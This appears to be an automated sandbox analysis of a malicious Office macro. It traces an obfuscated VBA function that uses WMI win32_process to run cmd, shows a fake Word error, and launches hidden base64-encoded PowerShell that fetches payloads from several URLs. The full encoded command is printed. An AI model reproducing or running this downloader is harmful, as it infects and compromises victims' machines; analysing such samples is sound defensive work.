Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: OtpOArK
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: iJkmJG
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: mbLvUI
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: vQbVHTJ
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: mbdQXnNAJ
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: SRadpEcF
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: gPxXF
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: IcBqyoTE
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: vMqQFsCmr
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: huzCVaAnM
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: AEpDpJGH
Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: nmoAspl
Array
TYMfJE
Target
Split
zzXfBb
ppqanE
Create	SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACcAbgBkADoALwAnACkAKwAnAC8AJwArACgAJwBlAC0AJwArACcAdwAnACsAJwBkAGUAcwBpAGcAbgAnACkAKwAnAC4AJwArACgAJwBlACcAKwAnAHUALwB3AHAAJwApACsAJwAtACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG4AdABlACcAKQArACgAJwBuAHQAJwArACcALwAnACsAJwBiAG4AMQBJAGcAJwArACcARAAnACsAJwBlAGoAaAAvACEAbgBzACAAJwApACsAKAAnAHcAdQAnACsAJwAgAGQAJwArACcAYgAgAG4AZAAnACkAKwAnADoALwAnACsAJwAvACcAKwAnAHQAJwArACgAJwByAGEAJwArACcAdQBtAGYAJwApACsAJwByACcAKwAnAGEAJwArACgAJwB1AGUAJwArACcAbgAnACkAKwAoACcALQB1AGsAJwArACcAcgAnACkAKwAoACcAYQBpACcAKwAnAG4AZQAnACsAJwAuAGQAZQAnACkAKwAnAC8AYgAnACsAKAAnAGkAbgAnACsAJwAvAEoAeQBlACcAKQArACgAJwBTAC8AIQAnACsAJwBuAHMAIAB3AHUAIAAnACkAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AJwArACcAZABzADoAJwApACsAKAAnAC8ALwAnACsAJwBqAGYAbABtACcAKQArACgAJwBrAHQAJwArACcAZwAuAHcAcABjACcAKQArACcAbwBtACcAKwAoACcAcwB0AGEAJwArACcAZwBpACcAKwAnAG4AZwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAnACkAKwAoACcALwBBAEsAJwArACcALwAnACkAKwAoACcAIQBuAHMAJwArACcAIAB3AHUAIAAnACkAKwAoACcAZABiACAAJwArACcAbgBkACcAKQArACgAJwBzADoAJwArACcALwAvAGwAaQBuACcAKQArACcAaABrACcAKwAoACcAaQA,,) -> 0
S2xsub800b7
Tl85j6j2gy2n7qad
Array
uFHXMGsDH
Target
Split
UupSwG
wbcoCJA

Strings	Decrypted Strings
"A"
","
"high,critic"
"A"
","
"high,critic"
"ns wu db ""ndpns wu db nd"
"ns wu db ndrons wu db ndns wu db ndc""ens wu db ndsns wu db ndsns wu db ndns wu db nd"
"A"
","
"high,critic"
"ns wu db nd:wns wu db ndns w""u db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db nd"
"A"
","
"high,critic"
"wns wu db ndi""nns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db nd"
"A"
","
"high,critic"
"ns wu db ndns wu db nd"
"A"
","
"high,critic"
"A"
","
"high,critic"
"A"
","
"high,critic"
"A"
","
"high,critic"
"A"
","
"high,critic"
"A"
","
"high,critic"

Line	Instruction	Meta Information
2	Function Xusmagx95iuck_o3o()
3	Goto snBUla	executed
4	Const AjzpdH as String = "A"
5	Const jbkkjHHCd as String = ","
6	Const yqmFHJvF as String = "high,critic"
7	Dim FwMLnnSxs as Range
7	Set FwMLnnSxs = Array((AjzpdH), Target)	Array AjzpdH Target
8	If FwMLnnSxs Is Nothing Then
9	Endif
10	Dim rnfVw() as String
10	rnfVw = Split(yqmFHJvF, jbkkjHHCd)	Split yqmFHJvF jbkkjHHCd
10	snBUla:
12	skuwd = Nkemmqfhxex + U765y5vgf_ao0faq.Content + Dt5ebejo9lypr_3vmp	Nkemmqfhxex Content Dt5ebejo9lypr_3vmp
15	Goto uUNTnPDJ
16	Const wPuUI as String = "A"
17	Const QNBiBDJF as String = ","
18	Const TfZstIBWb as String = "high,critic"
19	Dim GyemVIEQ as Range
19	Set GyemVIEQ = Array((wPuUI), Target)	Array wPuUI Target
20	If GyemVIEQ Is Nothing Then
21	Endif
22	Dim kTIuCnPI() as String
22	kTIuCnPI = Split(TfZstIBWb, QNBiBDJF)	Split TfZstIBWb QNBiBDJF
22	uUNTnPDJ:
24	mjbBYHhbs = "ns wu db " + "ndpns wu db nd"
25	I8bgyvyef5pdaj7_v = "ns wu db ndrons wu db ndns wu db ndc" + "ens wu db ndsns wu db ndsns wu db ndns wu db nd"
26	Goto dtPsGEOG
27	Const mQUInscCB as String = "A"
28	Const PmHbFtBA as String = ","
29	Const NxyDdD as String = "high,critic"
30	Dim ENgVDEnDI as Range
30	Set ENgVDEnDI = Array((mQUInscCB), Target)	Array mQUInscCB Target
31	If ENgVDEnDI Is Nothing Then
32	Endif
33	Dim TmgVHr() as String
33	TmgVHr = Split(NxyDdD, PmHbFtBA)	Split NxyDdD PmHbFtBA
33	dtPsGEOG:
35	A3hie1o1mwdgk_9_ = "ns wu db nd:wns wu db ndns w" + "u db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db nd"
36	Goto bwTdFGH
37	Const ZcbWFy as String = "A"
38	Const jmprxcAGG as String = ","
39	Const uwcdCFcFJ as String = "high,critic"
40	Dim GhFhH as Range
40	Set GhFhH = Array((ZcbWFy), Target)	Array ZcbWFy Target
41	If GhFhH Is Nothing Then
42	Endif
43	Dim auKzIlBI() as String
43	auKzIlBI = Split(uwcdCFcFJ, jmprxcAGG)	Split uwcdCFcFJ jmprxcAGG
43	bwTdFGH:
45	Bn1mqobqcygrsk1zn = "wns wu db ndi" + "nns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db nd"
46	Goto FCnAjUBF
47	Const upIoDlhH as String = "A"
48	Const BZLGJ as String = ","
49	Const DpdIEHHc as String = "high,critic"
50	Dim yifdCzUX as Range
50	Set yifdCzUX = Array((upIoDlhH), Target)	Array upIoDlhH Target
51	If yifdCzUX Is Nothing Then
52	Endif
53	Dim vmuBOT() as String
53	vmuBOT = Split(DpdIEHHc, BZLGJ)	Split DpdIEHHc BZLGJ
53	FCnAjUBF:
55	Acbncig4c2s9p = "ns wu db ndns wu db nd" + Mid(Application.Name, 60 / 10, 1) + "ns wu db ndns wu db nd"	Mid Name Application
56	Goto dmJpUJBT
57	Const LFmsHlGJO as String = "A"
58	Const VlJBAxsF as String = ","
59	Const DReLBGD as String = "high,critic"
60	Dim IUtVX as Range
60	Set IUtVX = Array((LFmsHlGJO), Target)	Array LFmsHlGJO Target
61	If IUtVX Is Nothing Then
62	Endif
63	Dim LgSUu() as String
63	LgSUu = Split(DReLBGD, VlJBAxsF)	Split DReLBGD VlJBAxsF
63	dmJpUJBT:
65	C4s8ozri2fdnbsu4 = Bn1mqobqcygrsk1zn + Acbncig4c2s9p + A3hie1o1mwdgk_9_ + mjbBYHhbs + I8bgyvyef5pdaj7_v
66	Goto cskzymBH
67	Const QttEc as String = "A"
68	Const sInuFuLII as String = ","
69	Const ybkwIF as String = "high,critic"
70	Dim YYiqHCrBJ as Range
70	Set YYiqHCrBJ = Array((QttEc), Target)	Array QttEc Target
71	If YYiqHCrBJ Is Nothing Then
72	Endif
73	Dim jEGWECK() as String
73	jEGWECK = Split(ybkwIF, sInuFuLII)	Split ybkwIF sInuFuLII
73	cskzymBH:
75	Eqhw188dzwgnq = Zr9iedzfw6nr(C4s8ozri2fdnbsu4)
76	Goto GKCGI
77	Const JNPIBwzJy as String = "A"
78	Const xJhvfW as String = ","
79	Const MtSXGFAwF as String = "high,critic"
80	Dim CtnVB as Range
80	Set CtnVB = Array((JNPIBwzJy), Target)	Array JNPIBwzJy Target
81	If CtnVB Is Nothing Then
82	Endif
83	Dim QFCSIz() as String
83	QFCSIz = Split(MtSXGFAwF, xJhvfW)	Split MtSXGFAwF xJhvfW
83	GKCGI:
85	Set Ixvxtuve66zxo = VBA.GetObject(Eqhw188dzwgnq)	GetObject("winmgmts:win32_process") executed
86	Goto OQtflfHc
87	Const vXvXQH as String = "A"
88	Const BBnudDV as String = ","
89	Const AnoeDGEY as String = "high,critic"
90	Dim nUxeKfi as Range
90	Set nUxeKfi = Array((vXvXQH), Target)	Array vXvXQH Target
91	If nUxeKfi Is Nothing Then
92	Endif
93	Dim LJgRGnI() as String
93	LJgRGnI = Split(AnoeDGEY, BBnudDV)	Split AnoeDGEY BBnudDV
93	OQtflfHc:
95	mxkikw = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))	Mid Len(" ns wu db ndns wu db ndcns wu db ndmns wu db nddns wu db nd ns wu db ndcns wu db ndmns wu db nddns wu db nd ns wu db nd/ns wu db ndcns wu db nd ns wu db ndmns wu db nd^ns wu db ndsns wu db nd^ns wu db ndgns wu db nd ns wu db nd%ns wu db nduns wu db ndsns wu db ndens wu db ndrns wu db ndnns wu db ndans wu db ndmns wu db ndens wu db nd%ns wu db nd ns wu db nd/ns wu db ndvns wu db nd ns wu db ndWns wu db ndons wu db nd^ns wu db ndrns wu db nddns wu db nd ns wu db ndens wu db ndxns wu db ndpns wu db nd^ns wu db ndens wu db ndrns wu db ndins wu db ndens wu db ndnns wu db nd^ns wu db ndcns wu db ndens wu db nddns wu db nd ns wu db ndans wu db ndnns wu db nd ns wu db ndens wu db ndrns wu db nd^ns wu db ndrns wu db ndons wu db ndrns wu db nd ns wu db ndtns wu db ndrns wu db ndyns wu db ndins wu db nd^ns wu db ndnns wu db ndgns wu db nd ns wu db ndtns wu db ndons wu db nd ns wu db ndons wu db ndpns wu db nd^ns wu db ndens wu db ndnns wu db nd ns wu db ndtns wu db ndhns wu db nd^ns wu db ndens wu db nd ns wu db ndfns wu db ndins wu db nd^ns wu db ndlns wu db ndens wu db nd.ns wu db nd ns wu db nd&ns wu db nd ns wu db ndpns wu db nd^ns wu db ndons wu db ndwns wu db ndens wu db nd^ns wu db ndrns wu db ndsns wu db nd^ns wu db ndhns wu db ndens wu db nd^ns wu db ndlns wu db ndlns wu db nd^ns wu db nd ns wu db nd-ns wu db ndwns wu db nd ns wu db ndhns wu db ndins wu db nd^ns wu db nddns wu db nddns wu db nd^ns wu db ndens wu db ndnns wu db nd ns wu db nd-ns wu db nd^ns wu db ndens wu db nd^ns wu db ndnns wu db ndcns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd IAns wu db ndAgns wu db ndAFns wu db ndMAns wu db ndZQns wu db ndBUns wu db ndACns wu db nd0Ans wu db ndSQns wu db ndBUns wu db ndAEns wu db ndUAns wu db ndTQns wu db ndAgns wu db ndACns wu db ndAAns wu db ndKAns wu db ndAnns wu db ndAHns wu db ndYAns wu db ndJwns wu db ndArns wu db ndACns wu db ndcAns wu db ndQQns wu db ndBSns wu db ndAGns wu db ndkAns wu db ndYQns wu db ndAnns wu db ndACns wu db ndsAns wu db ndJwns wu db ndBCns wu db ndAGns wu db ndwAns wu db ndRQns wu db ndA6ns wu db ndAGns wu db ndYAns wu db ndJwns wu db ndArns wu db ndACns wu db ndcAns wu db ndNwns wu db ndBEns wu db ndACns wu db ndcAns wu db ndKwns wu db ndAnns wu db ndAEns wu db ndgAns wu db ndJwns wu db ndApns wu db ndACns wu db ndAAns wu db ndIAns wu db ndAons wu db ndACns wu db ndAAns wu db ndWwns wu db ndBUns wu db ndAFns wu db ndkAns wu db ndUAns wu db ndBlns wu db ndAFns wu db nd0Ans wu db ndKAns wu db ndAins wu db ndAHns wu db ndsAns wu db ndMgns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMAns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndNAns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMQns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMwns wu db ndB9ns wu db ndACns wu db ndIAns wu db ndLQns wu db ndBGns wu db ndACns wu db ndAAns wu db ndJwns wu db ndBTns wu db ndAHns wu db ndQAns wu db ndZQns wu db ndBNns wu db ndACns wu db nd4Ans wu db ndaQns wu db ndBPns wu db ndACns wu db ndcAns wu db ndLAns wu db ndAnns wu db ndAGns wu db ndMAns wu db nddAns wu db ndBvns wu db ndACns wu db ndcAns wu db ndLAns wu db ndAnns wu db ndAHns wu db ndMAns wu db ndeQns wu db ndAnns wu db ndACns wu db ndwAns wu db ndJwns wu db ndByns wu db ndAHns wu db ndkAns wu db ndJwns wu db ndAsns wu db ndACns wu db ndcAns wu db ndLgns wu db ndBkns wu db ndAGns wu db ndkAns wu db ndcgns wu db ndBlns wu db ndACns wu db ndcAns wu db ndKQns wu db ndApns wu db ndACns wu db ndAAns wu db ndIAns wu db ndA7ns wu db ndACns wu db ndAAns wu db ndcwns wu db ndBFns wu db ndAHns wu db ndQAns wu db ndLQns wu db ndBJns wu db ndAHns wu db ndQAns wu db ndRQns wu db ndBNns wu db ndACns wu db ndAAns wu db ndVgns wu db ndBhns wu db ndAFns wu db ndIAns wu db ndaQns wu db ndBBns wu db ndAEns wu db ndIAns wu db ndTAns wu db ndBlns wu db ndADns wu db ndoAns wu db ndUwns wu db ndBnns wu db ndADns wu db ndIAns wu db ndeAns wu db ndBVns wu db ndACns wu db ndAAns wu db ndKAns wu db ndAgns wu db ndACns wu db ndAAns wu db ndWwns wu d) -> 37616 executed
96	pqwm = Zr9iedzfw6nr(mxkikw)
97	Goto zImEIFI
98	Const TYMfJE as String = "A"
99	Const ppqanE as String = ","
100	Const zzXfBb as String = "high,critic"
101	Dim YXgZLBuTI as Range
101	Set YXgZLBuTI = Array((TYMfJE), Target)	Array TYMfJE Target
102	If YXgZLBuTI Is Nothing Then
103	Endif
104	Dim qJJnPFoNQ() as String
104	qJJnPFoNQ = Split(zzXfBb, ppqanE)	Split zzXfBb ppqanE
104	zImEIFI:
106	Ixvxtuve66zxo.Create pqwm, S2xsub800b7, Tl85j6j2gy2n7qad	SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACcAbgBkADoALwAnACkAKwAnAC8AJwArACgAJwBlAC0AJwArACcAdwAnACsAJwBkAGUAcwBpAGcAbgAnACkAKwAnAC4AJwArACgAJwBlACcAKwAnAHUALwB3AHAAJwApACsAJwAtACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG4AdABlACcAKQArACgAJwBuAHQAJwArACcALwAnACsAJwBiAG4AMQBJAGcAJwArACcARAAnACsAJwBlAGoAaAAvACEAbgBzACAAJwApACsAKAAnAHcAdQAnACsAJwAgAGQAJwArACcAYgAgAG4AZAAnACkAKwAnADoALwAnACsAJwAvACcAKwAnAHQAJwArACgAJwByAGEAJwArACcAdQBtAGYAJwApACsAJwByACcAKwAnAGEAJwArACgAJwB1AGUAJwArACcAbgAnACkAKwAoACcALQB1AGsAJwArACcAcgAnACkAKwAoACcAYQBpACcAKwAnAG4AZQAnACsAJwAuAGQAZQAnACkAKwAnAC8AYgAnACsAKAAnAGkAbgAnACsAJwAvAEoAeQBlACcAKQArACgAJwBTAC8AIQAnACsAJwBuAHMAIAB3AHUAIAAnACkAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AJwArACcAZABzADoAJwApACsAKAAnAC8ALwAnACsAJwBqAGYAbABtACcAKQArACgAJwBrAHQAJwArACcAZwAuAHcAcABjACcAKQArACcAbwBtACcAKwAoACcAcwB0AGEAJwArACcAZwBpACcAKwAnAG4AZwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAnACkAKwAoACcALwBBAEsAJwArACcALwAnACkAKwAoACcAIQBuAHMAJwArACcAIAB3AHUAIAAnACkAKwAoACcAZABiACAAJwArACcAbgBkACcAKQArACgAJwBzADoAJwArACcALwAvAGwAaQBuACcAKQArACcAaABrACcAKwAoACcAaQA,,) -> 0 S2xsub800b7 Tl85j6j2gy2n7qad executed
107	Goto LcJWChpF
108	Const uFHXMGsDH as String = "A"
109	Const wbcoCJA as String = ","
110	Const UupSwG as String = "high,critic"
111	Dim IfvyDH as Range
111	Set IfvyDH = Array((uFHXMGsDH), Target)	Array uFHXMGsDH Target
112	If IfvyDH Is Nothing Then
113	Endif
114	Dim HfUXFJwF() as String
114	HfUXFJwF = Split(UupSwG, wbcoCJA)	Split UupSwG wbcoCJA
114	LcJWChpF:
116	End Function

Function Zr9iedzfw6nr, APIs: 62, Strings: 12, Number of lines: 50, Relevance: 111.05

APIs	Meta Information
Array
OtpOArK
Target
Split
iJkmJG
mbLvUI
Array
vQbVHTJ
Target
Split
mbdQXnNAJ
SRadpEcF
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Array
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: UrnhFG
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Target
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Split
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: LYEtDJDB
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: AeZXCL
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Array
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: bTSPCh
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Target
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Split
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: XfKDE
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: eJIkEagfC
